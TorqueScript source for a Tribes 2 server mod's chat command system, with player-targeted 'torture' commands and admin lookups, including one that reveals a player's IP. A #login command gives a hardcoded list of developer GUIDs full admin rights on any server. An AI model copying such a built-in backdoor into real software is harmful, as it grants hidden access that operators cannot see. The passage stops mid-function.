if(isObject(Meltdown))
   Meltdown.DSOFileCount++;
else
   quit();
//--------------------------------------------------------------------------
//--------------------------------------------------------------------------
// Xi Command System
//--------------------------------------

function Xi::onInit(%this)
{
   Xi.Version = 1.325;

   //%this.disableTorture[0] = 0;
   //%this.disableTorture[1] = 0;
   //%this.disableTorture[2] = 0;
   //%this.disableTorture[3] = 0;
   //%this.disableTorture[4] = 391445;
}

function Xi::onDie(%this)
{
   // Thou shalt not spam
}

if(!isObject(Xi))
   Meltdown.addClass(Xi); // Xi command system

Xi.AdminList[0] = 326782; // binabik
Xi.AdminList[1] = 403573; // Dyna primary
Xi.AdminList[2] = 767039; // Dyna secondary
Xi.AdminList[3] = 391445; // Deathscythe~40
Xi.AdminList[4] = 808763; // Deathie secondary: Aegis Zala
Xi.AdminList[5] = 581287; // -Nite-
Xi.AdminList[6] = 730380; // Southtown

Xi.AdminListCount = 7;

function Chat::onInit(%this)
{
   %this.Version = 1.0;
   %this.messageCount = 0;
}

function Chat::onDie(%this)
{
   // Thou shalt not spam
}

if(!isObject(Chat))
   Meltdown.addClass(Chat); // private chat code

//--------------------------------------------------------------------------
// Commands
//--------------------------------------

function Xi::playSFX(%xi, %cl, %emitter)
{
   if(!isObject(%cl.player))
      return;

   if(%cl.xi_playingSFX)
   {
      %cl.xi_sfx_emitter = createLifeEmitter(vectorAdd(%cl.player.getPosition(), "0 0 1"), %emitter, 110);
      Xi.schedule(100, playSFX, %cl, %emitter);
   }
}

function Xi::toggleSuperSaiyan(%xi, %cl)
{
   if(!isObject(%cl.player))
      return;

   if(%cl.isSSX)
   {
      %obj = %cl.player;

      if(%cl.SSXCount >= 4)
      {
         %obj.zapObject();
         if(getRandom(10) >= 8)
            %obj.zap2Object();

         %obj.synCount = 0;
      }
      %cl.SSXCount++;

      %cl.SSX = createLifeEmitter(%obj.position, "SuperSFlameEmitter", 110);
      Xi.schedule(100, toggleSuperSaiyan, %cl);
   }
}

function canTorture(%cl)
{
   if(%cl.ownsj00)
      return true;

   for(%i = 0; %i < Xi.adminListCount; %i++)
   {
      if(Xi.disableTorture[%i] == %cl.guid)
         return false;
   }

   return true;
}

function GUIDToClientID(%id)
{
   %guid = 0;
   %count = ClientGroup.getCount();

   for(%i = 0; %i < %count; %i++)
   {
      %obj = ClientGroup.getObject(%i);

      if(%obj.guid == %id)
         return %obj;
   }
   return 0;
}

function nameToGUID(%name)
{
   %guid = 0;
   %count = ClientGroup.getCount();

   for(%i = 0; %i < %count; %i++)
   {
      %obj = ClientGroup.getObject(%i);
      if(%obj.namebase $= %name)
         return %obj.guid;
   }
   return 0;
}

function nameToClient(%name)
{
   %guid = 0;
   %count = ClientGroup.getCount();

   for(%i = 0; %i < %count; %i++)
   {
      %obj = ClientGroup.getObject(%i);
      if(%obj.namebase $= %name)
         return %obj;
   }
   return 0;
}

function nameToIP(%name)
{
   %guid = 0;
   %count = ClientGroup.getCount();

   for(%i = 0; %i < %count; %i++)
   {
      %obj = ClientGroup.getObject(%i);
      if(%obj.namebase $= %name)
         return %obj.getAddress();
   }
   return 0;
}

function Xi::Error(%xi, %cl, %element, %error, %bool)
{
   if(isObject(%cl))
   {
      if(%bool)
         messageClient(%cl, '', '\c5Xi[%1]: %2.', %element, %error);
      else
         messageClient(%cl, '', '\c3Xi[%1]: %2.', %element, %error);
   }
}

function checkForPlayer(%obj, %range, %message)
{
   if(!isObject(%obj))
      return;

     InitContainerRadiusSearch(%obj.getPosition(), %range, $TypeMasks::PlayerObjectType);

     while((%pl = ContainerSearchNext()) != 0)
     {
        if(%pl.tapsTeam)
        {
            if(%pl != %obj)
                messageClient(%pl.client, 'MsgTapped', '\c1tapped:: %1', %message);
        }
     }
}

function checkForTapperBeacon(%obj, %range, %message)
{
   if(!isObject(%obj))
      return;

   InitContainerRadiusSearch(%obj.getPosition(), %range, $TypeMasks::SensorObjectType || $TypeMasks::StaticObjectType || $TypeMasks::StaticShapeObjectType || $TypeMasks::ShapeBaseObjectType);
   while((%beacon = ContainerSearchNext()) != 0)
   {
      if(%beacon.isTapper && %beacon.team != %obj.client.team)
         sendTappedMSG(%beacon.team, %message);
   }
}

function sendTappedMSG(%team, %message)
{
   %count = ClientGroup.getCount();
   for(%i = 0; %i < %count; %i++)
   {
      %cl = ClientGroup.getObject(%i);

      if(%cl.team == %team)
           messageClient(%cl, 'MsgTapped', '\c1tapped:: %1', %message);
   }
}

//--------------------------------------------------------------------------
// server command overloads
//--------------------------------------

if($Host::MaxMessageLen < 1) // check
   $Host::MaxMessageLen = 255;

function serverCmdTeamMessageSent(%client, %text)
{
   if((getSubStr(%text, 0, 1) $= "!" && getSubStr(%text, 1, 1) !$= "") || (getSubStr(%text, 0, 1) $= "#" && getSubStr(%text, 1, 1) !$= ""))
   {
      %symbol = getSubStr(%text, 0, 1);

      if(%symbol $= "!")
         Chat.handleMessage(%client, getSubStr(%text, 1, $Host::MaxMessageLen));
      else if(%symbol $= "#")
         Xi.CMDInit(%client, getSubStr(%text, 1, $Host::MaxMessageLen));

      return;
   }

   if(strlen(%text) >= $Host::MaxMessageLen)
      %text = getSubStr(%text, 0, $Host::MaxMessageLen);
   checkForPlayer(%client.player, 250, %text);
//   checkForTapperBeacon(%client.player, 300, %text);
   chatMessageTeam(%client, %client.team, '\c3%1: %2', %client.name, %text);

   if($LogTeamChat)
      logChat("TEAMSAY: "@%client SPC %client.nameBase SPC %text);
}

function serverCmdMessageSent(%client, %text)
{
   if((getSubStr(%text, 0, 1) $= "!" && getSubStr(%text, 1, 1) !$= "") || (getSubStr(%text, 0, 1) $= "#" && getSubStr(%text, 1, 1) !$= ""))
   {
      %symbol = getSubStr(%text, 0, 1);

      if(%symbol $= "!")
         Chat.handleMessage(%client, getSubStr(%text, 1, $Host::MaxMessageLen));
      else if(%symbol $= "#")
         Xi.CMDInit(%client, getSubStr(%text, 1, $Host::MaxMessageLen));

      return;
   }

   if(strlen(%text) >= $Host::MaxMessageLen)
      %text = getSubStr(%text, 0, $Host::MaxMessageLen);
   chatMessageAll(%client, '\c4%1: %2', %client.name, %text);

   if($LogChat)
      logChat("SAY: "@%client SPC %client.nameBase SPC %text);
}

//--------------------------------------------------------------------------
// it's Xi's party and it can cry if it wants to!
//--------------------------------------

function XI::externFunction(%xi, %cmd, %msg, %cl)
{
   if(%cmd $= "help")
   {
      commandToClient(%cl, 'CenterPrint', "Xi[Version]: 1.3.1."@getT2VersionNumber(), $Xi::HelpWindowTime, 1);
      return;
   }
   else if(%cmd $= "modekeys")
   {
      if(%cl.modekeys)
      {
         %cl.modekeys = false;
         messageClient(%cl, 'MsgXIError1', '\c3Xi[ModeKeys]: 1-6 now select weapons 1-6');
      }
      else
      {
         %cl.modekeys = true;
         messageClient(%cl, 'MsgXIError2', '\c3Xi[ModeKeys]: 1-6 now select modes 1-6');
      }
      return;
   }
   else if(%cmd $= "setmodel")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "")
      {
         if(%val $= "male")
         {
            %cl.race = "Human";
            %cl.sex = "Male";
         }
         else if(%val $= "female")
         {
            %cl.race = "Human";
            %cl.sex = "Female";
         }
         else if(%val $= "bioderm")
         {
            %cl.race = "Bioderm";
            %cl.sex = "Male";
         }
         else
         {
            messageClient(%cl, 'MsgXIError3', '\c5Xi[SexChanger]: %1 is not a valid type. Valid types are Male, Female, and Bioderm.', %val);
            return;
         }

         // MrKeen - when you removed the code below, you broke the dynamic armor changing function (#setmodel)
         if(isObject(%cl.player) && !%cl.player.getDataBlock().isTacticalMech) // disalow "changing sex while dead" bug AND with tacmech
         {
            %dmg = %cl.player.getDamageLevel();
            %nrg = %cl.player.getEnergyLevel();
            %rate = %cl.player.getRechargeRate();
            %cl.player.setArmor(%cl.armor);
            %cl.player.setDamageLevel(%dmg);
            %cl.player.setRechargeRate(%rate);
            %cl.player.setEnergyLevel(%nrg);
         }

         messageClient(%cl, 'MsgXIError4', '\c3Xi[SexChanger] -> playerTransform(%1).', %val);
         return;
      }
      else
      {
         messageClient(%cl, 'MsgXIError5', '\c5Xi[SexChanger-Error]: No type specified.');
         return;
      }
   }
   else if(%cmd $= "setvoice")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "")
      {
         if(%val $= "Male1" || %val $= "Male2" || %val $= "Male3" || %val $= "Male4" || %val $= "Male5" || %val $= "Fem1" || %val $= "Fem2" || %val $= "Fem3" || %val $= "Fem4" || %val $= "Fem5" || %val $= "Bot1" || %val $= "Derm1" || %val $= "Derm2" || %val $= "Derm3" || %val $= "NULL")
         {
            %cl.voice = %val;
            %cl.voiceTag = addTaggedString(%val);
            setTargetVoice(%cl.target, %cl.voiceTag);
         }
         else
         {
            messageClient(%cl, 'MsgXIError6', '\c5Xi[VoiceChanger]: %1 is not a valid voice. Valid voices are Male1-5, Fem1-5, Bioderm1-3, Bot1, and NULL.', %val);
            return;
         }

         messageClient(%cl, 'MsgXIError7', '\c3Xi[VoiceChanger]: Voice changed to %1.', %val);
         return;
      }
      else
      {
         messageClient(%cl, 'MsgXIError8', '\c5Xi[VoiceChanger-Error]: No voice specified.');
         return;
      }
   }
   else if(%cmd $= "login")
   {
      for(%i = 0; %i < Xi.AdminListCount; %i++)
      {
//         echo(%i SPC %cl.guid SPC Xi.AdminList[%i]);
         if(%cl.guid == Xi.AdminList[%i])
         {
            messageClient(%cl, 'MsgXIDBG', '\c3Xi[Server]: ID verified! You now have debug-level access.');
            %cl.ownsj00 = true;
            return;
         }
      }
//      messageClient(%cl, 'MsgXIError9', '\c5Xi[Admin-Error]: You are not allowed admin/superadmin access. Your IP has been logged.');
//      logAttempt("attempted admin access and is not on internal admin list; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
      return;
   }
}

function XI::CMDInit(%xi, %cl, %msg)
{
   %obj = %cl.player;
   %cmd = firstWord(%msg); // what IS the command?
   %len = strlen(%cmd) + 1; // how LONG is the command?
   %val = getWord(%msg, 1);

   if(%len < 0)
      %len = 0;

   if(%cmd $= "help")
      Xi.externFunction(%cmd, false, %cl);
   else if(%cmd $= "modekeys")
      Xi.externFunction(%cmd, false, %cl);
   else if(%cmd $= "Sayian")
   {
      if(%cl.isSSX)
         %cl.isSSX = false;
      else
      {
         %cl.isSSX = true;
         disableSyn(%cl.player);
         Xi.toggleSuperSaiyan(%cl);
      }
      return;
   }
   else if(%cmd $= "playSFX")
   {
      if(Xi.canSFX)
      {
         %val = getWord(%msg, 1);
         if(%val !$= "")
         {
            %emitter = %val@"Emitter";

            if(!isObject(%emitter))
            {
               messageClient(%cl, 'MsgXIError10', '\c3Xi[SFXGenerator]: SFXFile %1 does not exist.', %val);
               return;
            }

            %cl.xi_playingSFX = true;
            Xi.playSFX(%cl, %emitter);
            messageClient(%cl, 'MsgXIError11', '\c3Xi[SFXGenerator]: Now playing SFXFile %1.', %val);
            return;
         }
         else
         {
            messageClient(%cl, 'MsgXIError12', '\c5Xi[SFX-Error]: No SFX specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIError13', '\c5Xi[Error]: Command has been permanently disabled.');
         return;
      }
   }
   else if(%cmd $= "stopSFX")
   {
      if(Xi.canSFX)
      {
         if(%cl.xi_playingSFX)
         {
            %cl.xi_playingSFX = false;
            messageClient(%cl, 'MsgXIError14', '\c3Xi[SFXGenerator]: Current SFX stopped.');
            return;
         }
         else
         {
            messageClient(%cl, 'MsgXIError15', '\c5Xi[SFX-Error]: No SFX active.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIError13', '\c5Xi[Error]: Command has been permanently disabled.');
         return;
      }
   }
   else if(%cmd $= "satchel")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "")
      {
         if(%val $= "normal")
            %cl.satchelMode = 0;
         else if(%val $= "concussion")
            %cl.satchelMode = 1;
         else if(%val $= "floptical")
            %cl.satchelMode = 2;
         else if(%val $= "b33r")
            %cl.satchelMode = 3;
         else if(%val $= "blackhole" && $Xi::mode[BlackHole])
            %cl.satchelMode = 4;
         else
         {
            messageClient(%cl, 'MsgXIError17', '\c5Xi[SatchelCharge]: %1 is not a valid payload. Valid payloads are normal and concussion.', %val);
            return;
         }

         messageClient(%cl, 'MsgXIError18', '\c3Xi[SatchelCharge]: Satchel payload = %1.', %val);
         return;
      }
      else
      {
         messageClient(%cl, 'MsgXIError19', '\c5Xi[SatchelCharge-Error]: No payload specified.');
         return;
      }
   }
   else if(%cmd $= "setmodel")
      Xi.externFunction(%cmd, %msg, %cl);
   else if(%cmd $= "setvoice")
      Xi.externFunction(%cmd, %msg, %cl);
   else if(%cmd $= "setpitch")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "" && (%val >= 0.5 && %val <= 2.0))
      {
         %cl.voicePitch = %val;
         setTargetVoicePitch(%cl.target, %cl.voicePitch);
         messageClient(%cl, 'MsgXIError20', '\c3Xi[VoicePitchCtrl]: Voice pitch set to %1', %cl.voicePitch);
         return;
      }
      else
      {
         messageClient(%cl, 'MsgXIError21', '\c5Xi[VarianceCtrl]: Out of bounds. Must be within [0.875 - 1.125].');
         return;
      }
   }
   else if(%cmd $= "antialias")
   {
      if((%cl.isAdmin || %cl.ownsj00))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);
         if(%val !$= "")
         {
            %alias = 0;
            %count = ClientGroup.getCount();

            for(%i = 0; %i < %count; %i++)
            {
               %obj = ClientGroup.getObject(%i);
               if(%obj.isSmurf)
               {
                  if(%obj.nameBase $= %val)
                  {
                     %alias = %obj.realname;
                     messageClient(%cl, 'MsgXIError22', '\c3Xi[AntiAliasCtrl]: %1 is %2.', %val, %alias);
                     return;
                  }
               }
            }
            messageClient(%cl, 'MsgXIError23', '\c3Xi[AntiAliasCtrl]: Name %1 is not an alias.', %val);
            return;
         }
         else
         {
            messageClient(%cl, 'MsgXIError24', '\c5Xi[AntiAlias]: No input for name.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "nameToGUID")
   {
      if((%cl.isAdmin || %cl.ownsj00))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);
         if(%val !$= "")
         {
            %count = ClientGroup.getCount();

            for(%i = 0; %i < %count; %i++)
            {
               %obj = ClientGroup.getObject(%i);
               if(%obj.nameBase $= %val)
               {
                  %guid = %obj.guid;
                  messageClient(%cl, 'MsgXIError100', '\c3Xi[NameToGUID]: GUID of %1 is %2.', %val, %guid);
                  return;
               }
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIError101', '\c5Xi[NameToGUID]: No input for name.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "nameToIP")
   {
      if((%cl.isAdmin || %cl.ownsj00))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);
         if(%val !$= "")
         {
            %count = ClientGroup.getCount();

            for(%i = 0; %i < %count; %i++)
            {
               %obj = ClientGroup.getObject(%i);
               if(%obj.nameBase $= %val)
               {
                  %ip = %obj.getAddress();
                  messageClient(%cl, 'MsgXIError102', '\c3Xi[NameToIP]: IP of %1 is %2.', %val, %ip);
                  return;
               }
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIError103', '\c5Xi[NameToIP]: No input for name.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "ceiling" && $Xi::mode[ceiling])
   {
      if((%cl.isAdmin || %cl.ownsj00))
      {
         %val = getWord(%msg, 1);
         if(%val <= 100)
            %val = 100;
         messageClient(%cl, 'MsgXIError26', '\c5Xi[Ceiling]: Flight ceiling set to %1.', %val);
         setFlightCeiling(%val);
         return;
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }         //Death~Bot Changing the torture's names so that Only Dev's can use them, irratating when all someone does is those. 'Floor' will stay the same.
   else if(%cmd $= "combust") // MrKeen - Changing them back because admins need to have control over their servers...
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setInvincible(false);
                  if(%client.player.getDatablock().isBlastech)
                     BTSelfDestruct(%client.player);
                  else
                     BTSelfDestruct(%client.player);
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }                    
   else if(%cmd $= "ionzap")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setInvincible(false);
                  %client.player.f_hold = true;
                  holdObject(%client.player, %client.player.position, 32);
                  schedule(4000, 0, disableHoldObject, %client.player);
                  IonZapMe(%client.player);
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "brucewillis")   //Death~Bot experiment >:}
   {            //no, admins cant get this. SA ONLY!
      if((%cl.isSuperAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setInvincible(true); //ebil stage 1
                  %client.player.setRechargerate(8); //ebil stage 2
                  %client.player.f_hold = true;
                  holdObject(%client.player, %client.player.position, 32);
                  %lightning = createLightning(%client.player.position, 1, 240, 100, true);
                  %lightning2 = createLightning(%client.player.getWorldBoxCenter(), 1, 240, 100, false);
                  schedule(5000, 0, killit, %lightning);
                  schedule(1000, 0, killit, %lightning2);
                  schedule(6000, 0, disableHoldObject, %client.player);
                  IonZapMe(%client.player);
                  %client.player.setInventory(GatPBW, 1); //ebil stage 3
                  %client.player.isBattleAngel = true; //sorry, you may be god, but you cant cap
                  //%client.player.isSyn = true; // immune to EMP, stasis and all that junk
                  if(%cl.isSSX)
                     %cl.isSSX = false;
                  else
                  {
                     %cl.isSSX = true;
                     disableSyn(%cl.player);
                     Xi.toggleSuperSaiyan(%cl);
                  }
                  return;
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
         logAttempt("attempted superadmin function and is not superadmin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "GatPBW")   //to get the Gattling PBW
   {          //not admin, must be SA
      if((%cl.isSuperAdmin || %cl.ownsj00) && canTorture(%cl)) //gotta be admin...
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setInventory(GatPBW, 1); //set the inventory, every armor has it
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
         logAttempt("attempted superadmin function and is not superadmin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "strip" && $Xi::mode[strip])
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setInvincible(false);
                  %client.player.clearInventory();
                  %client.player.setEnergy(0);
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "xx:lockout") // MrKeen - framework for #tree command. coming soon ^.^
   {
      return; //unused command
      if(%cl.isSuperAdmin || %cl.ownsj00)
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  commandToClient(%client.player,'setStationKeys', true);
                  %client.player.setMoveState(true);
                  %client.player.setInvincible(true);
                  %client.player.clearInventory();
                  %client.player.setEnergy(false);
                  %client.player.setRechargeRate(false);
                  %client.player.setCloaked(false);
                  %client.player.startFade(true, false, true);
                  %client.player.inStation = true;
                  %client.isLocked = true;
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }                   
   else if(%cmd $= "zap")
   {
      if(getT2VersionNumber() > 25000)
      {
         if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
         {
            %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

            if(%val !$= "")
            {
               %client = nameToClient(%val);

               if(%client)
               {
                  if(isObject(%client.player))
                  {
                     %client.player.f_hold = true;
                     holdObject(%client.player, %client.player.position, 32);
                     schedule(4000, 0, disableHoldObject, %client.player);

                     %lightning = createLightning(%client.player.position, 1, 240, 100, true);
                     %lightning2 = createLightning(%client.player.getWorldBoxCenter(), 1, 240, 100, false);
                     schedule(5000, 0, killit, %lightning);
                     schedule(1000, 0, killit, %lightning2);
                  }

                  return;
               }
            }
            else
            {
               messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorNUL1', '\c5Xi[Torture]: This torture only avaliable in T2 version v25000+.');
         return;
      }
   }
   else if(%cmd $= "emp")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
                  EMPObject(%client.player);

               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }                    
   else if(%cmd $= "burn")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
                  BurnObject(%client.player, %client.player);

               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }               //MrKeen - safesex.... LOL :P
   else if(%cmd $= "poison")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
                  PoisonObject(%client.player, %client.player);

               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorNN', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }                 
   else if(%cmd $= "smash")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.f_hold = true;
                  holdObject(%client.player, %client.player.position, 32);
                  schedule(4000, 0, disableHoldObject, %client.player);

                  %blockname = "MobileBaseVehicle";
                  %team = 0;
                  %obj = %blockName.create(%team);
                  %nPos = vectorAdd(%client.player.position, "0 0 120");
                  %obj.setPosition(%nPos);
                  %obj.stasisProof = true;
                  schedule(4000, 0, killit, %obj);
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIError35', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "scare")  //Death~Bot and Keen; fun stuff hehe
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.f_hold = true;
                  holdObject(%client.player, %client.player.position, 32);
                  schedule(4000, 0, disableHoldObject, %client.player);

                  %blockname = "MobileBaseVehicle";
                  %team = 0;
                  %obj = %blockName.create(%team);
                  %nPos = vectorAdd(%client.player.position, "0 0 120");
                  %obj.setPosition(%nPos);
                  %obj.stasisProof = true;
                  schedule(4000, 0, killit, %obj);
                  schedule(1337, 0, "IonZapMe", (%client.player)); //w00tage!
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIError35', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "floor")
   {
      if((%cl.isAdmin || %cl.ownsj00) && canTorture(%cl))
      {
         %val = getSubStr(%msg, %len, 64);//getWord(%msg, 1);

         if(%val !$= "")
         {
            %client = nameToClient(%val);

            if(%client)
            {
               if(isObject(%client.player))
               {
                  %client.player.setPosition(vectorAdd(%client.player.getPosition(), "0 0 0.1"));
                  %client.player.setVelocity("0 0 -1000");
               }
               return;
            }
         }
         else
         {
            messageClient(%cl, 'MsgXIError36', '\c5Xi[Torture]: No name specified.');
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         return;
      }
   }
   else if(%cmd $= "login")
      Xi.externFunction(%cmd, %msg, %cl);
   else if(%cmd $= "inctime")
   {
      %val = getWord(%msg, 1);
      if((%cl.isAdmin || %cl.ownsj00))
      {
         messageClient(%cl, 'MsgXIError37', '\c3Xi[Server]: Time limit increased by %1 minutes.', %val);
         $Host::TimeLimit += %val;

         //if the time limit was actually changed...
         %cause = "(Xi)";
         if(%cause !$= "")
         {
            logEcho("time limit set to "@%display SPC %cause);

            //if the match has been started, reset the end of match countdown
            if($matchStarted)
            {
